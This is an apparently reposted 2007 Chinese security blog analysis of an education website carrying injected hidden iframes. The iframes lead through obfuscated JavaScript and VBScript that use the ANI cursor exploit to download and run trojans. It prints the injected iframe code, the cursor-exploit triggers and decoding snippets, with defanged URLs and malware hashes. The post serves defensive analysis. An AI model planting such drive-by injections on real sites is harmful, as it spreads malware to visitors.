某市河西区教育信息网升级为历代挂马技术展示平台
来源:互联网 发布:西工大网络教育 编辑:程序博客网 时间:2024/04/27 18:23
endurer 原创
2007-05-15 第1版
此前普发现此网被加入传播Worm.Win32.Viking.jr等的代码,可参考:
某市河西区教育信息网被加入传播Worm.Win32.Viking.jr等的代码
http://endurer.bokee.com/6186405.html
http://blog.csdn.net/Purpleendurer/archive/2007/03/26/1542040.aspx
http://blog.sina.com.cn/u/49926d910100082w
刚才去转了一下,发现那里已“升级”成了历代挂马技术展示平台,从加入多余空格、用escape()加密等简单方法,到US-ASCII、ANI漏洞,一应俱全。
在主页末发现代码:
/---
<iframe src="hxxp://w***.q**b*b**d.com/bd***.htm?001" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://www.m***m*ju.net/bbs/tj***.htm" width="0" height="0" frameborder="0"></iframe> <iframe src="hxxp://idc**.ki*s***163.com/index.html?id=hagk" width="0" height="0"></iframe>
<iframe src=hxxp://www.hao123***hao123*.cn/ok***/index.htm width=0 height=0></iframe><iframe src=hxxp://www.x**4*5*4**.cn/ width=100 height=0 frameborder=0></iframe><iframe src=hxxp://www.x**4*5*4**.cn/ width=100 height=0 frameborder=0></iframe><iframe src=hxxp://www.x**4*5*4**.cn/ width=100 height=0 frameborder=0></iframe>
<iframe src=hxxp://qq***.h*1***48.cn/ width=100 height=0 frameborder=0></iframe>
---/
hxxp://w***.q**b*b**d.com/bd***.htm?001 包含代码:
/---
<BODY style='CURSOR: url(hxxp://s***.g*c***uj.com/t.js)'>
<iframe src="hxxp://s***.g*c***uj.com/1.htm" width="0" height="0" frameborder="0"></iframe>
---/
t.js 利用 ANI 漏洞 下载 0.exe
文件说明符 : D:/test/0.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-15 12:55:0
修改时间 : 2007-5-15 12:55:52
访问时间 : 2007-5-15 12:56:53
大小 : 36864 字节 36.0 KB
MD5 : 03e68c72bb560cd19711afdebd63c73c
Kaspersky 报为 Worm.Win32.Delf.bs
hxxp://s***.g*c***uj.com/1.htm的内容为 Javascript 代码,功能是用unescape() 解出 变量 Words 的值并输出。
解出的Words 值为 VBScript 代码,功能是利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 0.exe, 保存为 IE临时文件夹中的 install.com,并利用Shell.Application 对象 Q 的 ShellExecute 方法 来运行。
hxxp://s***.g*c***uj.com/bd.htm?001 的内容与hxxp://w***.q**b*b**d.com/bd***.htm?001相同。
hxxp://idc**.ki*s***163.com/index.html?id=hagk 包含代码:
/---
<script src=css.js></script>
---/
hxxp://idc**.ki*s***163.com/css.js 内容为JavaScript脚本代码,功能为用自定义函数解密代码并通过 eval() 来运行。
解密后的内容为JavaScript脚本代码,功能为是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 hxxp://bo*ol***o*m.com/love.exe, 就是 昨天
小心免费送6位QQ号码的网站传播Worm.Win32.Viking.lj/Worm.Viking.sv
http://endurer.bokee.com/6274049.html
http://blog.csdn.net/Purpleendurer/archive/2007/05/14/1608238.aspx
http://blog.sina.com.cn/u/49926d91010008pd
中的那个。
hxxp://www.hao123***hao123*.cn/ok***/index.htm 包含代码:
/---
<iframe src="hxxp://www.hao123***hao123*.cn/bbs/1881.htm" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://www.hao123***hao123*.cn/bbs/1881.htm 包含代码:
/---
<iframe src="hxxp://www.f*z***zv.com/sousuo.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://www.955***92**2.cn/web.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://www.hao123***hao123*.cn/" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://www.i***p**5*28.cn/" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://www.f*z***zv.com/sousuo.htm 包含代码:
/---
<iframe src="hxxp://s***.g*c***uj.com/bd.htm?268001" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://s***.g*c***uj.com/bd.htm?268001内容与hxxp://w***.q**b*b**d.com/bd***.htm?001相同。
hxxp://www.955***92**2.cn/web.htm 包含代码:
/---
<iframe src=hxxp://www.1****8d**m*m***.com/dm/kehu0738.htm width=0 height=0></iframe>
---/
hxxp://www.1****8d**m*m***.com/dm/kehu0738.htm 的包含使用是US-ASCII编码的字符串。到http://purpleendurer.ys168.com 下载 US-ASCII加密、解密程序 进行解密,得到的内容为:
/---
<HTML>
<BODY>
<DIV id=new_content_jp style="DISPLAY: none">
<DIV style="CURSOR: url('hxxp://1****8d**m*m***.com/arp/1.jpg')">
<DIV style="CURSOR: url('hxxp://1****8d**m*m***.com/arp/2.jpg')"></DIV></DIV></DIV>
<SCRIPT language=javascript src="hxxp://1****8d**m*m***.com/arp/run.js"></SCRIPT>
</BODY>
<iframe src=hxxp://www.1****8d**m*m***.com/arp/0614.htm width=0 height=0></iframe>
</HTML>
---/
1.jpg 和 2.jpg 利用 ANI 漏洞下载 down.exe
文件说明符 : D:/test/down.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-15 13:15:51
修改时间 : 2007-5-15 13:17:39
访问时间 : 2007-5-15 13:18:17
大小 : 18944 字节 18.512 KB
MD5 : c23c3fabe68fdadd14a89bf111f8bf2e
Kaspersky 报为 Trojan-Downloader.Win32.Delf.bko
hxxp://1****8d**m*m***.com/arp/run.js 的功能是检测浏览器种类和版本,并输出 显示 1.jpg 和 2.jpg 的代码。
hxxp://www.1****8d**m*m***.com/arp/0614.htm 包含 JavaScript 和 VBScript 代码,使用代码
/---
DO WHILE LEN(S)>1
k="&H"+ucase(LEFT(S,2))
p=CLng(k)
m=chr(p)
D=D&m
S=mymid(S)
LOOP
---/
解密变量 S 的值,按照变量 flag_type 的值,以VBScript、JavaScript 或 HTML的形式输出。这里flag_type 的 值 为 "vbs",所以输出的是 VBScript 代码,功能是 利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 down.exe,保存到IE临时文件夹中,创建 down.vbs,并利用Shell.Application 对象 Q 的 ShellExecute 方法 来运行。
hxxp://www.hao123***hao123*.cn/ 包含代码:
/---
<iframe src=hxxp://www.s*en***love.com/a**/2.htm width=50 height=0></iframe>
---/
hxxp://www.s*en***love.com/a**/2.htm 包含代码:
/---
<DIV style="CURSOR: url('hxxp://www.s*en***love.com/a**/a.jpg')">
<DIV style="CURSOR: url('hxxp://www.s*en***love.com/a**/b.jpg')"></DIV></DIV></BODY></HTML>
<iframe src=v1.htm width=0 height=0></iframe>
---/
a.jpg 和 b.jpg 利用 ANI 漏洞下载 hxxp://www.s*en***love.com/a**/2.exe
文件说明符 : D:/test/2.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-15 13:23:35
修改时间 : 2007-5-15 13:24:28
访问时间 : 2007-5-15 13:25:1
大小 : 23030 字节 22.502 KB
MD5 : b43b5493549c4f7658850bdbe41e8c4f
Kaspersky 报为 Trojan-PSW.Win32.Delf.qc
hxxp://www.s*en***love.com/a**/v1.htm 包含代码:
/---
<script src=1.js></script>
---/
1.js打不开,可能已不存在。
hxxp://www.i***p**5*28.cn/ 包含代码:
/---
<iframe src=hxxp://www.08***3***25.cn/wm/xin4***.htm?110 width=0 height=0></iframe>
---/
hxxp://www.08***3***25.cn/wm/xin4***.htm?110 包含代码:
/---
<BODY style='CURSOR: url(hxxp://www.08***3***25.cn/wm/d.jpg)'></BODY>
</HTML>
<script src=hxxp://www.08***3***25.cn/wm/0614.js></script>
---/
d.jpg 利用 ANI 漏洞下载 hxxp://www.08***3***25.cn/wm/down.exe
文件说明符 : D:/test/down.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-15 13:42:49
修改时间 : 2007-5-15 13:43:54
访问时间 : 2007-5-15 13:44:42
大小 : 16619 字节 16.235 KB
MD5 : a961822d4e5d96a4f2e58be91f83a450
Kaspersky 报为 Trojan-Downloader.Win32.Delf.bko 和 Worm.Win32.Delf.bs
hxxp://www.08***3***25.cn/wm/0614.js的内容为JavaScript脚本代码,功能为用自定义函数解密代码并通过 eval() 来运行。
经过2次解密后的内容为JavaScript脚本代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 down.exe,保存到%windir%,文件名由自定义函数:
/---
function gn(n){ var number = Math.random()*n; return ‘~tmp’+‘.tmp’;}
---/
生成,即~tmp.tmp,然后通过 Shell.Application 对象 Q 的 ShellExecute 方法执行命令: %windir%/system32/cmd.exe /c %windir%/~tmp.tmp 来运行。
hxxp://www.x**4*5*4**.cn/ 包含代码:
/---
<iframe src="hxxp://qq.5**20s**f.org/4*1**/index.htm" width="100" height="0"> </iframe>
<iframe src=hxxp://qq.5**20s**f.org/4*1**/06014.htm width=0 height=0></iframe>
<iframe src="hxxp://www.5**4*6***0w.cn/index.htm" width="100" height="0"> </iframe>
<iframe src="hxxp://www.m***hk***j52**0.com/index.htm" width="100" height="0"> </iframe>
---/
hxxp://qq.5**20s**f.org/4*1**/index.htm 包含代码:
/---
<script src="hxxp://qq.5**20s**f.org/4*1**/xjz2007.js"></script>
---/
hxxp://qq.5**20s**f.org/4*1**/xjz2007.js 包含代码:
/---
document.writeln("<iframe src=xjz2007.htm width=0 height=0 frameborder=0><//iframe>");
document.writeln("<DIV style=/"CURSOR: url(/'xjz2007.bmp/')/">");
document.writeln("<//DIV><//BODY><//HTML>")
---/
hxxp://qq.5**20s**f.org/4*1**/xjz2007.htm 包含VBScript代码,不过不用解密,因为变量xinchunkuaile 值已经展示下载的文件是 6xz.exe。
文件说明符 : D:/test/6xz.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-15 13:45:1
修改时间 : 2007-5-15 13:45:1
访问时间 : 2007-5-15 13:45:23
大小 : 22528 字节 22.0 KB
MD5 : 410da0576768619b234adbda5ba06bc5
Kaspersky 报为 Downloader.Win32.Small.eor
xjz2007.bmp 利用 ANI 漏洞下载 6xz.exe
hxxp://qq.5**20s**f.org/4*1**/06014.htm 的内容加入有许多空格,所含javaScript代码的功能是其功能是利用 Adodb.Stream、Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载6xz.exe,保存为ie.exe,创建 ie.vbs,并利用Shell.Application 对象 Q 的 ShellExecute 方法 来运行。
其中还包含一个自定义函数Exploit()。
hxxp://www.5**4*6***0w.cn/index.htm 包含代码:
/---
<iframe src="hxxp://www.p***um**a163**.com/p***u/709671697.htm?56" width="0" height="0" frameborder="0"></iframe>
s"></script>
---/
hxxp://www.p***um**a163**.com/p***u/709671697.htm?56 包含代码:
/---
<script src=614.js></script>
---/
hxxp://www.p***um**a163**.com/p***u/614.js的内容与
小心免费送6位QQ号码的网站传播Worm.Win32.Viking.lj/Worm.Viking.sv
http://endurer.bokee.com/6274049.html
http://blog.csdn.net/Purpleendurer/archive/2007/05/14/1608238.aspx
http://blog.sina.com.cn/u/49926d91010008pd
中的相同,下载 pu.exe。
hxxp://www.m***hk***j52**0.com/index.htm 包含代码:
/---
<iframe src=hxxp://www.08***3***25.cn/wm/xin16.htm width=0 height=0></iframe>
---/
hxxp://www.08***3***25.cn/wm/xin16.htm 内容与 hxxp://www.08***3***25.cn/wm/xin4***.htm?110相同。
hxxp://qq***.h*1***48.cn/ 打不开。
- 某市河西区教育信息网升级为历代挂马技术展示平台
- 某市河西区教育信息网被加入传播Worm.Win32.Viking.jr等的代码
- 我为教育技术而“献身”
- 信息网
- 3Com千兆以太网方案构建上海嘉定教育信息网
- Python3爬取某教育平台题库保存为Word文档
- 某县农业信息网挂马 Worm.Win32.AutoRun.umf
- 有线电视综合信息网技术读书笔记-第一章
- 新版山东大学就业信息网技术架构介绍
- VRRP技术实例(某市级单位核心交换机VRRP配置)
- 技术积累应用-可视化编程平台应用方式-数据展示
- 在线教育平台、网校搭建、远程教育平台搭建技术选型(268教育)
- 搭建教育直播平台
- 教育平台开发思路
- 天津河西区小妹信息天津河西区上门服务
- 一个精准而巨大的流量平台—分类信息网
- 基于Web Service的系统集成技术在网络教育平台中的应用
- 基于Web Service的系统集成技术在网络教育平台中的应用
- A股B股H股
- 跳空低开
- 软件测试基础
- 忆杭州,忆西湖
- VC网络编程-Winsock开发网络通信程序的经典入门
- 某市河西区教育信息网升级为历代挂马技术展示平台
- oracle中生成树中每个节点对应其所有子孙的映射
- tomcat的问题
- C#中string与byte[]的转换帮助类
- c#中分割字符串的几种方法
- C#字符串处理类
- HIBERNATE部分站点
- RequestDispatcher
- 回发或回调参数无效。在配置中使用 或在页面中使用 启用了事件验证。